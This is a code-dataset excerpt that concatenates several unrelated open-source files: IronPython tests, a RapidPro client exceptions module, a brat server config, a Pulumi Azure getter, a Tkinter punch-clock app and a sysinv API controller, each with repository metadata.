clr.AddReferenceToFileAndPath(os.path.join(self.temporary_dir, 'testilcode_%d.dll' % os.getpid()))
import AbstractILTest
class x(AbstractILTest):
def Baz(self): return "42"
a = x()
self.assertEqual(AbstractILTest.Helper(a), "42")
finally:
os.unlink(testilcode)
def test_field_assign(self):
"""assign to an instance field through the type"""
from IronPythonTest.BinderTest import KeywordBase
def f():
KeywordBase.SomeField = 42
self.assertRaises(ValueError, f)
def test_event_validates_callable(self):
from IronPythonTest import DelegateTest
def f(): DelegateTest.StaticEvent += 3
self.assertRaisesMessage(TypeError, "event addition expected callable object, got int", f)
def test_struct_assign(self):
from IronPythonTest.BinderTest import ValueTypeWithFields
from System import Array
def noWarnMethod():
arr = Array.CreateInstance(ValueTypeWithFields, 10)
ValueTypeWithFields.X.SetValue(arr[0], 42)
def warnMethod():
arr = Array.CreateInstance(ValueTypeWithFields, 10)
arr[0].X = 42
self.assertNotWarns(RuntimeWarning, noWarnMethod)
self.assertWarns(RuntimeWarning, warnMethod)
def test_ctor_field_assign_conversions(self):
from IronPythonTest.BinderTest import ValueTypeWithFields
res = ValueTypeWithFields(Y=42)
res.Y = 42
self.assertEqual(ValueTypeWithFields(Y=42), res)
class myint(int): pass
self.assertEqual(ValueTypeWithFields(Y=myint(42)), res)
def test_iterator_dispose(self):
# getting an enumerator from an enumerable should dispose the new enumerator
from IronPythonTest import EnumerableTest, MyEnumerator
box = clr.StrongBox[bool](False)
ietest = EnumerableTest(box)
for x in ietest:
pass
self.assertEqual(box.Value, True)
# enumerating on an enumerator shouldn't dispose the box
box = clr.StrongBox[bool](False)
ietest = MyEnumerator(box)
for x in ietest:
pass
self.assertEqual(box.Value, False)
def test_system_doc(self):
try:
# may or may not get documentation depending on XML files availability
x = System.__doc__
except:
self.fail('test_system_doc')
def test_scope_getvariable(self):
import clr
clr.AddReference('IronPython')
clr.AddReference('Microsoft.Scripting')
from IronPython.Hosting import Python
from Microsoft.Scripting import ScopeVariable
scope = Python.CreateEngine().CreateScope()
var = scope.GetScopeVariable('foo')
self.assertEqual(type(var), ScopeVariable)
def test_weird_compare(self):
from IronPythonTest import WithCompare
self.assertTrue('__cmp__' not in WithCompare.__dict__) # TODO: revisit this once we decide how to map CompareTo to Python
def test_convert_int64_to_float(self):
self.assertEqual(float(System.Int64(42)), 42.0)
self.assertEqual(type(float(System.Int64(42))), float)
def test_cp24004(self):
self.assertTrue("Find" in System.Array.__dict__)
def test_cp23772(self):
a = System.Array
x = a[int]([1, 2, 3])
f = lambda x: x == 2
g = a.Find[int]
self.assertEqual(g.__call__(match=f, array=x), 2)
def test_cp23938(self):
dt = System.DateTime()
x = dt.ToString
y = dt.__getattribute__("ToString")
self.assertEqual(x, y)
z = dt.__getattribute__(*("ToString",))
self.assertEqual(x, z)
self.assertEqual(None.__getattribute__(*("__class__",)),
None.__getattribute__("__class__"))
class Base(object):
def __getattribute__(self, name):
return object.__getattribute__(*(self, name))
class Derived(Base):
def __getattr__(self, name):
if name == "bar":
return 23
raise AttributeError(*(name,))
def __getattribute__(self, name):
return Base.__getattribute__(*(self, name))
a = Derived(*())
self.assertEqual(a.bar, 23)
def test_nothrow_attr_access(self):
self.assertEqual(hasattr('System', 'does_not_exist'), False)
self.assertEqual(hasattr(type, '__all__'), False)
@unittest.skipIf(is_netcoreapp or is_posix, 'No WPF available')
def test_xaml_support(self):
from IronPythonTest import XamlTestObject, InnerXamlTextObject
text = """<custom:XamlTestObject
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
x:Name="TestName"
xmlns:custom="clr-namespace:IronPythonTest;assembly=IronPythonTest" Event="MyEventHandler">
<custom:InnerXamlTextObject x:Name="Foo">
<custom:InnerXamlTextObject x:Name="Bar">
<custom:InnerXamlTextObject2 Name="Baz">
</custom:InnerXamlTextObject2>
</custom:InnerXamlTextObject>
</custom:InnerXamlTextObject>
</custom:XamlTestObject>"""
import os
import wpf
import clr
clr.AddReference('System.Xml')
fname = 'test_%d.xaml' % os.getpid()
self.write_to_file(fname, text)
try:
# easy negative tests
self.assertRaises(TypeError, wpf.LoadComponent, None)
self.assertRaises(TypeError, wpf.LoadComponent, None, fname)
# try it again w/ a passed in module
class MyXamlRootObject(XamlTestObject):
def MyEventHandler(self, arg):
return arg * 2
def inputs():
yield fname
yield System.IO.FileStream(fname, System.IO.FileMode.Open)
yield System.Xml.XmlReader.Create(fname)
yield System.IO.StreamReader(fname)
for inp in inputs():
inst = wpf.LoadComponent(MyXamlRootObject(), inp)
self.assertEqual(inst.Method(42), 84)
self.assertEqual(type(inst.Foo), InnerXamlTextObject)
self.assertEqual(type(inst.Bar), InnerXamlTextObject)
self.assertEqual(inst.Foo.MyName, 'Foo')
self.assertEqual(inst.Baz.Name, 'Baz')
self.assertTrue(inst.Foo is not inst.Bar)
if isinstance(inp, System.IDisposable):
inp.Dispose()
import imp
mod = imp.new_module('foo')
class MyXamlRootObject(XamlTestObject):
pass
for inp in inputs():
# null input
self.assertRaises(TypeError, wpf.LoadComponent, mod, None)
# wrong type of root object
self.assertRaises(Exception, wpf.LoadComponent, mod, inp)
if isinstance(inp, System.IDisposable):
inp.Dispose()
for inp in inputs():
# root object missing event handler
self.assertRaises(System.Xaml.XamlObjectWriterException, wpf.LoadComponent, MyXamlRootObject(), inp)
if isinstance(inp, System.IDisposable):
inp.Dispose()
finally:
os.unlink(fname)
@unittest.skipIf(is_netcoreapp, "TODO: figure out")
def test_extension_methods(self):
import clr, imp, os
if is_netcoreapp:
clr.AddReference('System.Linq')
else:
clr.AddReference('System.Core')
test_cases = [
"""
# add reference via type
import clr
from System.Linq import Enumerable
class TheTestCase(IronPythonTestCase):
def test_reference_via_type(self):
self.assertNotIn('Where', dir([]))
clr.ImportExtensions(Enumerable)
self.assertIn('Where', dir([]))
self.assertEqual(list([2,3,4].Where(lambda x: x == 2)), [2])
""",
"""
# add reference via namespace
import clr
import System
class TheTestCase(IronPythonTestCase):
def test_reference_via_namespace(self):
self.assertNotIn('Where', dir([]))
clr.ImportExtensions(System.Linq)
self.assertIn('Where', dir([]))
self.assertEqual(list([2,3,4].Where(lambda x: x == 2)), [2])
""",
"""
# add reference via namespace, add new namespace w/ more specific type
import clr
import System
from IronPythonTest.ExtensionMethodTest import LinqCollision
class TheTestCase(IronPythonTestCase):
def test_namespace_reference(self):
self.assertNotIn('Where', dir([]))
clr.ImportExtensions(System.Linq)
self.assertIn('Where', dir([]))
self.assertEqual(list([2,3,4].Where(lambda x: x == 2)), [2])
clr.ImportExtensions(LinqCollision)
self.assertEqual([2,3,4].Where(lambda x: x == 2), 42)
""",
"""
import clr
class UserType(object): pass
class UserTypeWithValue(object):
def __init__(self):
self.BaseClass = 200
class UserTypeWithSlots(object):
__slots__ = 'BaseClass'
class UserTypeWithSlotsWithValue(object):
__slots__ = 'BaseClass'
def __init__(self):
self.BaseClass = 100
class TheTestCase(IronPythonTestCase):
def test_user_type(self):
self.assertRaises(AttributeError, lambda : UserType().BaseClass)
self.assertRaises(AttributeError, lambda : UserTypeWithSlots().BaseClass)
self.assertEqual(UserTypeWithValue().BaseClass, 200)
import clr
from IronPythonTest.ExtensionMethodTest import ClassRelationship
clr.ImportExtensions(ClassRelationship)
self.assertEqual(object().BaseClass(), 23)
self.assertEqual([].BaseClass(), 23)
self.assertEqual({}.BaseClass(), 23)
self.assertEqual(UserType().BaseClass(), 23)
# dict takes precedence
x = UserType()
x.BaseClass = 100
self.assertEqual(x.BaseClass, 100)
# slots take precedence
self.assertRaises(AttributeError, lambda : UserTypeWithSlots().BaseClass())
self.assertEqual(UserTypeWithSlotsWithValue().BaseClass, 100)
# dict takes precedence
self.assertEqual(UserTypeWithValue().BaseClass, 200)
""",
"""
import clr
import System
from IronPythonTest.ExtensionMethodTest import ClassRelationship
clr.ImportExtensions(ClassRelationship)
class TheTestCase(IronPythonTestCase):
def test_class_relationship(self):
self.assertEqual([].Interface(), 23)
self.assertEqual([].GenericInterface(), 23)
self.assertEqual([].GenericInterfaceAndMethod(), 23)
self.assertEqual([].GenericMethod(), 23)
self.assertEqual(System.Array[System.Int32]([2,3,4]).Array(), 23)
self.assertEqual(System.Array[int]([2,3,4]).Array(), 23)
self.assertEqual(System.Array[int]([2,3,4]).ArrayAndGenericMethod(), 23)
self.assertEqual(System.Array[int]([2,3,4]).GenericMethod(), 23)
self.assertEqual(object().GenericMethod(), 23)
""",
"""
import clr
import System
from System import Linq
clr.ImportExtensions(Linq)
class Product(object):
def __init__(self, cat, id, qtyOnHand ):
self.Cat = cat
self.ID = id
self.QtyOnHand = qtyOnHand
self.Q = self.QtyOnHand
class TheTestCase(IronPythonTestCase):
def test_extension_method(self):
products = [Product(prod[0], prod[1], prod[2]) for prod in
(('DrillRod', 'DR123', 45), ('Flange', 'F423', 12), ('Gizmo', 'G9872', 214), ('Sprocket', 'S534', 42))]
pd = products.Where(lambda prod: prod.Q < 40).Select(lambda prod: (prod.Cat, prod.ID) )
self.assertEqual(''.join(str(prod) for prod in pd), "('Flange', 'F423')")
# blows: "Type System.Collections.Generic.IEnumerable`1[TSource] contains generic parameters"
pd = products.Where(lambda prod: prod.Q < 40).AsEnumerable().Select(lambda prod: (prod.Cat, prod.ID) )
self.assertEqual(''.join(str(prod) for prod in pd), "('Flange', 'F423')")
pd = products.Where(lambda prod: prod.Q < 40) #ok
self.assertEqual(''.join((str(prod.Cat) + str(prod.ID) + str(prod.Q) for prod in pd)), 'FlangeF42312')
pd2 = pd.Select(lambda prod: (prod.Cat, prod.ID) ) #blows, same exception
self.assertEqual(''.join("Cat: {0}, ID: {1}".format(prod[0], prod[1]) for prod in pd2), "Cat: Flange, ID: F423")
pd2 = products.Select(lambda prod: (prod.Cat, prod.ID) ) #ok
self.assertEqual(''.join("Cat: {0}, ID: {1}".format(prod[0], prod[1]) for prod in pd2), 'Cat: DrillRod, ID: DR123Cat: Flange, ID: F423Cat: Gizmo, ID: G9872Cat: Sprocket, ID: S534')
pd2 = list(pd).Select(lambda prod: (prod.Cat, prod.ID) ) #ok
self.assertEqual(''.join("Cat: {0}, ID: {1}".format(prod[0], prod[1]) for prod in pd2), 'Cat: Flange, ID: F423')
pd = products.Where(lambda prod: prod.Q < 30).ToList() #blows, same exception
self.assertEqual(''.join("Cat: {0}, ID: {1}".format(prod.Cat, prod.ID) for prod in pd), 'Cat: Flange, ID: F423')
pd = list( products.Where(lambda prod: prod.Q < 30) ) #ok
self.assertEqual(''.join("Cat: {0}, ID: {1}".format(prod.Cat, prod.ID) for prod in pd), 'Cat: Flange, ID: F423')
# ok
pd = list( products.Where(lambda prod: prod.Q < 40) ).Select(lambda prod: "Cat: {0}, ID: {1}, Qty: {2}".format(prod.Cat, prod.ID, prod.Q))
self.assertEqual(''.join(prod for prod in pd), 'Cat: Flange, ID: F423, Qty: 12')
# ok
pd = ( list(products.Where(lambda prod: prod.Q < 40))
.Select(lambda prod: "Cat: {0}, ID: {1}, Qty: {2}".format(prod.Cat, prod.ID, prod.Q)) )
self.assertEqual(''.join(prod for prod in pd), 'Cat: Flange, ID: F423, Qty: 12')
"""
]
temp_module = 'temp_module_%d' % os.getpid()
fname = temp_module + '.py'
for test_case in test_cases:
try:
old_path = [x for x in sys.path]
sys.path.append('.')
with open(fname, 'w+') as f:
f.write('''
from test import support
from iptest import IronPythonTestCase
''')
f.write(test_case)
f.write('''
support.run_unittest(TheTestCase)''')
__import__(temp_module)
del sys.modules[temp_module]
finally:
os.unlink(fname)
sys.path = [x for x in old_path]
run_test(__name__)
| 35.835443 | 188 | 0.613098 |
253903cbd5286b07da7db3077a7bbe4830db4edc | 1,754 | py | Python | temba_client/exceptions.py | AfricasVoices/rapidpro-python | 1d5ce00d23a9b28c1f8d70cd18da82f18031b804 | [
"BSD-3-Clause"
] | 1 | 2021-03-02T03:00:47.000Z | 2021-03-02T03:00:47.000Z | temba_client/exceptions.py | AfricasVoices/rapidpro-python | 1d5ce00d23a9b28c1f8d70cd18da82f18031b804 | [
"BSD-3-Clause"
] | null | null | null | temba_client/exceptions.py | AfricasVoices/rapidpro-python | 1d5ce00d23a9b28c1f8d70cd18da82f18031b804 | [
"BSD-3-Clause"
] | null | null | null | class TembaException(Exception):
def __str__(self):
return self.message
class TembaConnectionError(TembaException):
message = "Unable to connect to host"
class TembaBadRequestError(TembaException):
def __init__(self, errors):
self.errors = errors
def __str__(self):
msgs = []
if isinstance(self.errors, dict):
for field, field_errors in self.errors.items():
if isinstance(field_errors, str): # e.g. {"detail": "message..."}
msgs.append(field_errors)
else:
for error in field_errors: # e.g. {"field1": ["msg1...", "msg2..."]}
msgs.append(error)
elif isinstance(self.errors, list):
msgs = self.errors
return msgs[0] if len(msgs) == 1 else ". ".join(msgs)
class TembaTokenError(TembaException):
message = "Authentication with provided token failed"
class TembaNoSuchObjectError(TembaException):
message = "No such object exists"
class TembaRateExceededError(TembaException):
message = (
"You have exceeded the number of requests allowed per org in a given time window. "
"Please wait %d seconds before making further requests"
)
def __init__(self, retry_after):
self.retry_after = retry_after
def __str__(self):
return self.message % self.retry_after
class TembaHttpError(TembaException):
def __init__(self, caused_by):
self.caused_by = caused_by
def __str__(self):
return str(self.caused_by)
class TembaSerializationException(TembaException):
pass
class TembaMultipleResultsError(TembaException):
message = "Request for single object returned multiple objects"
| 27.40625 | 91 | 0.649943 |
2f7c83b83136f3ace2e3d0b60b1c6d3709c58797 | 700 | py | Python | scripts/model/cat_model.py | usert5432/vlne | e3cafd30ecce3a2dbc4a37cc4257d07fb1a1785d | [
"MIT"
] | null | null | null | scripts/model/cat_model.py | usert5432/vlne | e3cafd30ecce3a2dbc4a37cc4257d07fb1a1785d | [
"MIT"
] | null | null | null | scripts/model/cat_model.py | usert5432/vlne | e3cafd30ecce3a2dbc4a37cc4257d07fb1a1785d | [
"MIT"
] | null | null | null | """Pretty Print training configuration and model structure"""
import argparse
from vlne.utils.io import load_model
def parse_cmdargs():
"""Parse command line arguments"""
parser = argparse.ArgumentParser("Pretty print model")
parser.add_argument(
'outdir',
metavar = 'OUTDIR',
type = str,
help = 'Directory with saved models'
)
return parser.parse_args()
def main():
# pylint: disable=missing-function-docstring
cmdargs = parse_cmdargs()
args, model = load_model(cmdargs.outdir, compile = False)
print(args.config.pprint())
#print(model.get_config())
print(model.summary())
if __name__ == '__main__':
main()
| 24.137931 | 61 | 0.658571 |
1797a203d7279891920c0ef3eecb7044567857da | 3,627 | py | Python | config.py | springto/brat | cfc1d0109388cd7d9a5fe3a1e41f20277605dbab | [
"CC-BY-3.0"
] | null | null | null | config.py | springto/brat | cfc1d0109388cd7d9a5fe3a1e41f20277605dbab | [
"CC-BY-3.0"
] | null | null | null | config.py | springto/brat | cfc1d0109388cd7d9a5fe3a1e41f20277605dbab | [
"CC-BY-3.0"
] | null | null | null | # This configuration was automatically generated by install.sh
from os.path import dirname, join as path_join
# This configuration file specifies the global setup of the brat
# server. It is recommended that you use the installation script
# instead of editing this file directly. To do this, run the following
# command in the brat directory:
#
# ./install.sh
#
# if you wish to configure the server manually, you will first need to
# make sure that this file appears as config.py in the brat server
# root directory. If this file is currently named config_template.py,
# you can do this as follows:
#
# cp config_template.py config.py
#
# you will then need to edit config.py, minimally replacing all
# instances of the string CHANGE_ME with their appropriate values.
# Please note that these values MUST appear in quotes, e.g. as in
#
# ADMIN_CONTACT_EMAIL = 'brat'
# Contact email for users to use if the software encounters errors
ADMIN_CONTACT_EMAIL = 'brat'
# Directories required by the brat server:
#
# BASE_DIR: directory in which the server is installed
# DATA_DIR: directory containing texts and annotations
# WORK_DIR: directory that the server uses for temporary files
#
BASE_DIR = dirname(__file__)
DATA_DIR = path_join(BASE_DIR, 'data')
WORK_DIR = path_join(BASE_DIR, 'work')
# If you have installed brat as suggested in the installation
# instructions, you can set up BASE_DIR, DATA_DIR and WORK_DIR by
# removing the three lines above and deleting the initial '#'
# character from the following four lines:
#from os.path import dirname, join
#BASE_DIR = dirname(__file__)
#DATA_DIR = path_join(BASE_DIR, 'data')
#WORK_DIR = path_join(BASE_DIR, 'work')
# To allow editing, include at least one USERNAME:PASSWORD pair below.
# The format is the following:
#
# 'USERNAME': 'PASSWORD',
#
# For example, user `editor` and password `annotate`:
#
# 'editor': 'annotate',
USER_PASSWORD = {
#'brat': 'brat',
# (add USERNAME:PASSWORD pairs below this line.)
}
########## ADVANCED CONFIGURATION OPTIONS ##########
# The following options control advanced aspects of the brat server
# setup. It is not necessary to edit these in a basic brat server
# installation.
### MAX_SEARCH_RESULT_NUMBER
# It may be a good idea to limit the max number of results to a search
# as very high numbers can be demanding of both server and clients.
# (unlimited if not defined or <= 0)
MAX_SEARCH_RESULT_NUMBER = 1000
### DEBUG
# Set to True to enable additional debug output
DEBUG = False
### LOG_LEVEL
# If you are a developer you may want to turn on extensive server
# logging by enabling LOG_LEVEL = LL_DEBUG
LL_DEBUG, LL_INFO, LL_WARNING, LL_ERROR, LL_CRITICAL = range(5)
LOG_LEVEL = LL_WARNING
#LOG_LEVEL = LL_DEBUG
### BACKUP_DIR
# Define to enable backups
# from os.path import join
#BACKUP_DIR = join(WORK_DIR, 'backup')
try:
assert DATA_DIR != BACKUP_DIR, 'DATA_DIR cannot equal BACKUP_DIR'
except NameError:
pass # BACKUP_DIR most likely not defined
### SVG_CONVERSION_COMMANDS
# If export to formats other than SVG is needed, the server must have
# a software capable of conversion like inkscape set up, and the
# following must be defined.
# (SETUP NOTE: at least Inkscape 0.46 requires the directory
# ".gnome2/" in the apache home directory and will crash if it doesn't
# exist.)
#SVG_CONVERSION_COMMANDS = [
# ('png', 'inkscape --export-area-drawing --without-gui --file=%s --export-png=%s'),
# ('pdf', 'inkscape --export-area-drawing --without-gui --file=%s --export-pdf=%s'),
# ('eps', 'inkscape --export-area-drawing --without-gui --file=%s --export-eps=%s'),
#]
| 39.857143 | 87 | 0.740006 |
71974268d6dd6a8406acbba6b91310ba74815108 | 8,391 | py | Python | sdk/python/pulumi_azure_native/policyinsights/get_remediation_at_management_group.py | pulumi-bot/pulumi-azure-native | f7b9490b5211544318e455e5cceafe47b628e12c | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/policyinsights/get_remediation_at_management_group.py | pulumi-bot/pulumi-azure-native | f7b9490b5211544318e455e5cceafe47b628e12c | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/policyinsights/get_remediation_at_management_group.py | pulumi-bot/pulumi-azure-native | f7b9490b5211544318e455e5cceafe47b628e12c | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
__all__ = [
'GetRemediationAtManagementGroupResult',
'AwaitableGetRemediationAtManagementGroupResult',
'get_remediation_at_management_group',
]
@pulumi.output_type
class GetRemediationAtManagementGroupResult:
"""
The remediation definition.
"""
def __init__(__self__, created_on=None, deployment_status=None, filters=None, id=None, last_updated_on=None, name=None, policy_assignment_id=None, policy_definition_reference_id=None, provisioning_state=None, resource_discovery_mode=None, type=None):
if created_on and not isinstance(created_on, str):
raise TypeError("Expected argument 'created_on' to be a str")
pulumi.set(__self__, "created_on", created_on)
if deployment_status and not isinstance(deployment_status, dict):
raise TypeError("Expected argument 'deployment_status' to be a dict")
pulumi.set(__self__, "deployment_status", deployment_status)
if filters and not isinstance(filters, dict):
raise TypeError("Expected argument 'filters' to be a dict")
pulumi.set(__self__, "filters", filters)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if last_updated_on and not isinstance(last_updated_on, str):
raise TypeError("Expected argument 'last_updated_on' to be a str")
pulumi.set(__self__, "last_updated_on", last_updated_on)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if policy_assignment_id and not isinstance(policy_assignment_id, str):
raise TypeError("Expected argument 'policy_assignment_id' to be a str")
pulumi.set(__self__, "policy_assignment_id", policy_assignment_id)
if policy_definition_reference_id and not isinstance(policy_definition_reference_id, str):
raise TypeError("Expected argument 'policy_definition_reference_id' to be a str")
pulumi.set(__self__, "policy_definition_reference_id", policy_definition_reference_id)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if resource_discovery_mode and not isinstance(resource_discovery_mode, str):
raise TypeError("Expected argument 'resource_discovery_mode' to be a str")
pulumi.set(__self__, "resource_discovery_mode", resource_discovery_mode)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="createdOn")
def created_on(self) -> str:
"""
The time at which the remediation was created.
"""
return pulumi.get(self, "created_on")
@property
@pulumi.getter(name="deploymentStatus")
def deployment_status(self) -> 'outputs.RemediationDeploymentSummaryResponse':
"""
The deployment status summary for all deployments created by the remediation.
"""
return pulumi.get(self, "deployment_status")
@property
@pulumi.getter
def filters(self) -> Optional['outputs.RemediationFiltersResponse']:
"""
The filters that will be applied to determine which resources to remediate.
"""
return pulumi.get(self, "filters")
@property
@pulumi.getter
def id(self) -> str:
"""
The ID of the remediation.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="lastUpdatedOn")
def last_updated_on(self) -> str:
"""
The time at which the remediation was last updated.
"""
return pulumi.get(self, "last_updated_on")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the remediation.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="policyAssignmentId")
def policy_assignment_id(self) -> Optional[str]:
"""
The resource ID of the policy assignment that should be remediated.
"""
return pulumi.get(self, "policy_assignment_id")
@property
@pulumi.getter(name="policyDefinitionReferenceId")
def policy_definition_reference_id(self) -> Optional[str]:
"""
The policy definition reference ID of the individual definition that should be remediated. Required when the policy assignment being remediated assigns a policy set definition.
"""
return pulumi.get(self, "policy_definition_reference_id")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The status of the remediation.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceDiscoveryMode")
def resource_discovery_mode(self) -> Optional[str]:
"""
The way resources to remediate are discovered. Defaults to ExistingNonCompliant if not specified.
"""
return pulumi.get(self, "resource_discovery_mode")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the remediation.
"""
return pulumi.get(self, "type")
class AwaitableGetRemediationAtManagementGroupResult(GetRemediationAtManagementGroupResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetRemediationAtManagementGroupResult(
created_on=self.created_on,
deployment_status=self.deployment_status,
filters=self.filters,
id=self.id,
last_updated_on=self.last_updated_on,
name=self.name,
policy_assignment_id=self.policy_assignment_id,
policy_definition_reference_id=self.policy_definition_reference_id,
provisioning_state=self.provisioning_state,
resource_discovery_mode=self.resource_discovery_mode,
type=self.type)
def get_remediation_at_management_group(management_group_id: Optional[str] = None,
management_groups_namespace: Optional[str] = None,
remediation_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetRemediationAtManagementGroupResult:
"""
The remediation definition.
API Version: 2019-07-01.
:param str management_group_id: Management group ID.
:param str management_groups_namespace: The namespace for Microsoft Management RP; only "Microsoft.Management" is allowed.
:param str remediation_name: The name of the remediation.
"""
__args__ = dict()
__args__['managementGroupId'] = management_group_id
__args__['managementGroupsNamespace'] = management_groups_namespace
__args__['remediationName'] = remediation_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:policyinsights:getRemediationAtManagementGroup', __args__, opts=opts, typ=GetRemediationAtManagementGroupResult).value
return AwaitableGetRemediationAtManagementGroupResult(
created_on=__ret__.created_on,
deployment_status=__ret__.deployment_status,
filters=__ret__.filters,
id=__ret__.id,
last_updated_on=__ret__.last_updated_on,
name=__ret__.name,
policy_assignment_id=__ret__.policy_assignment_id,
policy_definition_reference_id=__ret__.policy_definition_reference_id,
provisioning_state=__ret__.provisioning_state,
resource_discovery_mode=__ret__.resource_discovery_mode,
type=__ret__.type)
| 41.746269 | 254 | 0.685735 |
b3fd65db32486738567a6d6b313d1a2594fbc0b8 | 3,036 | py | Python | Project-NFC Reader/punchclock/punchclock.py | CurtisIreland/electronics | 99b2521bfde49587850ddaf224fa3ae52d55698c | [
"CC0-1.0"
] | 22 | 2018-01-07T05:59:44.000Z | 2022-03-04T03:22:27.000Z | Project-NFC Reader/punchclock/punchclock.py | CurtisIreland/electronics | 99b2521bfde49587850ddaf224fa3ae52d55698c | [
"CC0-1.0"
] | null | null | null | Project-NFC Reader/punchclock/punchclock.py | CurtisIreland/electronics | 99b2521bfde49587850ddaf224fa3ae52d55698c | [
"CC0-1.0"
] | 33 | 2016-05-30T03:45:52.000Z | 2022-03-29T10:26:43.000Z | import Tkinter as tk
import time
import clock_db
class Punchclock:
def __init__(self, master):
self.time1 = ''
self.card_read = ''
self.card_name = ''
self.rdwr_options = {
'targets': ['106A'],
'on-connect': lambda: scan_card(),
}
self.master = master
master.title('Punchclock')
master.attributes('-fullscreen', 1)
# master.configure(background="black")
self.clock=tk.Label(master, justify = tk.CENTER, font="Helvetica 32 bold")
self.clock.place(relx=0.2, rely=0.2, relwidth=0.3, relheight=0.15)
# Signin/Signout buttons
# Create bounding frame
self.button_frame=tk.Frame(master, height=150, width=550)
self.button_frame.visible = True
self.button_frame.place(relx=0.25, rely=0.4, width=550, height=150)
self.button_frame.pi = self.button_frame.place_info()
self.button_si=tk.Button(self.button_frame, text="Sign In", command=lambda: self.si_message())
self.button_si.place(x=50, y=50, width=200, height=50)
self.button_so=tk.Button(self.button_frame, text="Sign Out", command=lambda: self.so_message())
self.button_so.place(x=300, y=50, width=200, height=50)
# Line over status
self.canvas = tk.Canvas(master, width=2000, height=4, borderwidth=0, highlightthickness=0)
self.canvas.create_line(0,2,2000,2, fill="black")
self.canvas.place(relx=0.1, rely=0.8, relwidth=0.8, height=4)
#Status line
self.si_status=tk.Label(master, font="Helvetica 32 bold", anchor=tk.NW, text="")
self.si_status.place(relx=0.15, rely=0.81, relwidth=0.70, relheight=0.1)
# Generate buttons
#btnToggle = tk.Button(text="Test Scan", command=lambda: scan_card(0))
#btnToggle.place(x=70, y=150)
self.tick()
self.hide_buttons()
def tick(self):
# get the current local time from the PC
# time2 = time.strftime('%A %B %d, %Y\n%-I:%M:%S %p')
time2 = time.strftime('%A %B %d, %Y\n%H:%M:%S')
# if time string has changed, update it
if time2 != self.time1:
self.time1 = time2
self.clock.config(text=time2)
# calls itself every 200 milliseconds to update the time display as needed
# could use >200 ms, but display gets jerky
self.clock.after(200, lambda: self.tick())
def si_message(self):
check_time = time.strftime('%Y-%m-%d %H:%M:%S')
self.si_status.config(text="Signed in: " + self.card_name + " " + check_time)
clock_data = clock_db.clock_db()
clock_data.checkin(self.card_name, "IN", check_time)
clock_data.close()
self.hide_buttons()
def so_message(self):
check_time = time.strftime('%Y-%m-%d %H:%M:%S')
self.si_status.config(text="Signed out: " + self.card_name + " " + check_time)
clock_data = clock_db.clock_db()
clock_data.checkin(self.card_name, "OUT", check_time)
clock_data.close()
self.hide_buttons()
def hide_buttons(self):
self.button_frame.place_forget()
self.button_frame.visible = not self.button_frame.visible
if __name__ == '__main__':
root = tk.Tk()
my_punchclock = Punchclock(root)
root.mainloop() | 31.625 | 98 | 0.678195 |
c2c22b1aa45308b344bd8a26b921b0306bc6078d | 11,867 | py | Python | sysinv/sysinv/sysinv/sysinv/api/controllers/v1/load.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | null | null | null | sysinv/sysinv/sysinv/sysinv/api/controllers/v1/load.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | null | null | null | sysinv/sysinv/sysinv/sysinv/api/controllers/v1/load.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | 1 | 2021-01-05T16:24:58.000Z | 2021-01-05T16:24:58.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 UnitedStack Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Copyright (c) 2015-2016 Wind River Systems, Inc.
#
import jsonpatch
import socket
import pecan
import six
from pecan import rest
import wsme
from wsme import types as wtypes
import wsmeext.pecan as wsme_pecan
from sysinv.api.controllers.v1 import base
from sysinv.api.controllers.v1 import collection
from sysinv.api.controllers.v1 import link
from sysinv.api.controllers.v1 import types
from sysinv.api.controllers.v1 import utils
from sysinv.common.constants import ACTIVE_LOAD_STATE
from sysinv.common import constants
from sysinv.common import exception
from sysinv.common import utils as cutils
from sysinv import objects
from sysinv.openstack.common import log
from sysinv.openstack.common.gettextutils import _
from sysinv.openstack.common.rpc import common
LOG = log.getLogger(__name__)
class LoadPatchType(types.JsonPatchType):
@staticmethod
def mandatory_attrs():
return []
class LoadImportType(base.APIBase):
path_to_iso = wtypes.text
path_to_sig = wtypes.text
def __init__(self, **kwargs):
self.fields = ['path_to_iso', 'path_to_sig']
for k in self.fields:
setattr(self, k, kwargs.get(k))
